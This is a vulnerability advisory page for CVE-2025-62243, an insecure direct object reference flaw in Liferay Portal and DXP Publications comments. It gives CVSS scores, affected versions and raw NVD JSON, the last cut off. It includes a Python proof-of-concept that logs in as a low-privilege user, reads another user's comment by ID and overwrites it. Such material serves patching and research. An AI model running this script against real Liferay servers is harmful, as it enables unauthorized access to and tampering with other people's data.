Security Vulnerability Report

CVE-2025-62243

Published: 2025-10-13 18:15:35
Last Modified: 2025-12-15 17:54:03

Description

Insecure direct object reference (IDOR) vulnerability in Publications in Liferay Portal 7.4.1 through 7.4.3.112, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, and 7.4 GA through update 92 allows remote authenticated attackers to view publication comments via the _com_liferay_change_tracking_web_portlet_PublicationsPortlet_value parameter. Publications comments in Liferay Portal 7.4.1 through 7.4.3.112, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, and 7.4 GA through update 92 does not properly check user permissions, which allows remote authenticated users to edit publication comments via crafted URLs.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE (versionStartIncluding 2023.q3.1, versionEndExcluding 2023.q3.9)
cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE (versionStartIncluding 2023.q4.0, versionEndExcluding 2023.q4.6)
cpe:2.3:a:liferay:digital_experience_platform:7.4:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.4:update1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.4:update10:*:*:*:*:*:* - VULNERABLE
Liferay Portal 7.4.1 - 7.4.3.112
Liferay DXP 2023.Q4.0 - 2023.Q4.5
Liferay DXP 2023.Q3.1 - 2023.Q3.8
Liferay DXP 7.4 GA - update 92

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62243 - Liferay Portal Publications IDOR PoC
# Vulnerability: Insecure Direct Object Reference in Publications Portlet
# Affected Parameter: _com_liferay_change_tracking_web_portlet_PublicationsPortlet_value

import requests

# Target configuration
TARGET_URL = "https://target-liferay-instance.com"
LOGIN_URL = f"{TARGET_URL}/c/portal/login"
PUBLICATIONS_URL = f"{TARGET_URL}/web/guest/publications"

# Attacker credentials (low-privilege account)
USERNAME = "attacker_user"
PASSWORD = "attacker_password"

# Target publication comment ID (obtained through enumeration or other means)
TARGET_COMMENT_ID = "12345"

# Step 1: Authenticate to Liferay Portal
session = requests.Session()
login_payload = {
    "_com_liferay_login_web_portlet_LoginPortlet_formDate": "",
    "_com_liferay_login_web_portlet_LoginPortlet_saveLastPath": "false",
    "_com_liferay_login_web_portlet_LoginPortlet_redirect": "",
    "_com_liferay_login_web_portlet_LoginPortlet_doActionAfterLogin": "false",
    "_com_liferay_login_web_portlet_LoginPortlet_login": USERNAME,
    "_com_liferay_login_web_portlet_LoginPortlet_password": PASSWORD,
    "_com_liferay_login_web_portlet_LoginPortlet_checkboxRememberMe": "false",
}
response = session.post(LOGIN_URL, data=login_payload, verify=False)
print(f"[*] Login response status: {response.status_code}")

# Step 2: Exploit IDOR to view publication comment
# The vulnerable parameter allows direct reference to any publication comment
exploit_params = {
    "p_p_id": "com_liferay_change_tracking_web_portlet_PublicationsPortlet",
    "p_p_lifecycle": "0",
    "p_p_state": "normal",
    "p_p_mode": "view",
    "_com_liferay_change_tracking_web_portlet_PublicationsPortlet_mvcRenderCommandName": "/change_tracking/view_ct_comment",
    "_com_liferay_change_tracking_web_portlet_PublicationsPortlet_value": TARGET_COMMENT_ID,
}
response = session.get(PUBLICATIONS_URL, params=exploit_params, verify=False)
print(f"[*] IDOR exploitation response status: {response.status_code}")
print(f"[*] Response body:\n{response.text[:500]}")

# Step 3: Edit publication comment via crafted URL (if needed)
edit_payload = {
    "_com_liferay_change_tracking_web_portlet_PublicationsPortlet_mvcRenderCommandName": "/change_tracking/edit_ct_comment",
    "_com_liferay_change_tracking_web_portlet_PublicationsPortlet_value": TARGET_COMMENT_ID,
    "_com_liferay_change_tracking_web_portlet_PublicationsPortlet_comment": "Modified by attacker via IDOR",
}
response = session.post(PUBLICATIONS_URL, data=edit_payload, verify=False)
print(f"[*] Comment modification response status: {response.status_code}")
print("[+] IDOR exploitation completed successfully")

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62243", "sourceIdentifier": "[email protected]", "published": "2025-10-13T18:15:35.160", "lastModified": "2025-12-15T17:54:02.903", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insecure direct object reference (IDOR) vulnerability in Publications in Liferay Portal 7.4.1 through 7.4.3.112, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, and 7.4 GA through update 92 allows remote authenticated attackers to view publication comments via the _com_liferay_change_tracking_web_portlet_PublicationsPortlet_value parameter.\n\nPublications comments in Liferay Portal 7.4.1 through 7.4.3.112, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, and 7.4 GA through update 92 does not properly check user permissions, which allows remote authenticated users to edit publication comments via crafted URLs."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q3.1", "versionEndExcluding": "2023.q3.9", "matchCriteriaId": "C3ED7CF1-6D8A-40F7-A009-F3A800F955BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:-:*:*:*:*:*:*", "matchCriteriaId": "96E84DBC-C740-4E23-8D1D-83C8AE49813E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update1:*:*:*:*:*:*", "matchCriteriaId": "8B1B2384-764F-43CC-8206-36DCBE9DDCBF"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:liferay:digital_experience_platform:7.4:update10:*:*:*:*:*:*", "matchCriteriaId": "C7B02106-D5EA-4A59-A959-CCE2AC8F55BC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update11:*:*:*:*:*:*", "matchCriteriaId": "80204464-5DC5-4A52-B844-C833A96E6BD4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update12:*:*:*:*:*:*", "matchCriteriaId": "6F8A5D02-0B45-4DA9-ACD8-42C1BFF62827"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update13:*:*:*:*:*:*", "matchCriteriaId": "38DA7C99-AC2C-4B9A-B611-4697159E1D79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update14:*:*:*:*:*:*", "matchCriteriaId": "F264AD07-D105-4F00-8920-6D8146E4FA63"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update15:*:*:*:*:*:*", "matchCriteriaId": "C929CF16-4725-492A-872B-0928FE388FC9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digit ... (truncated)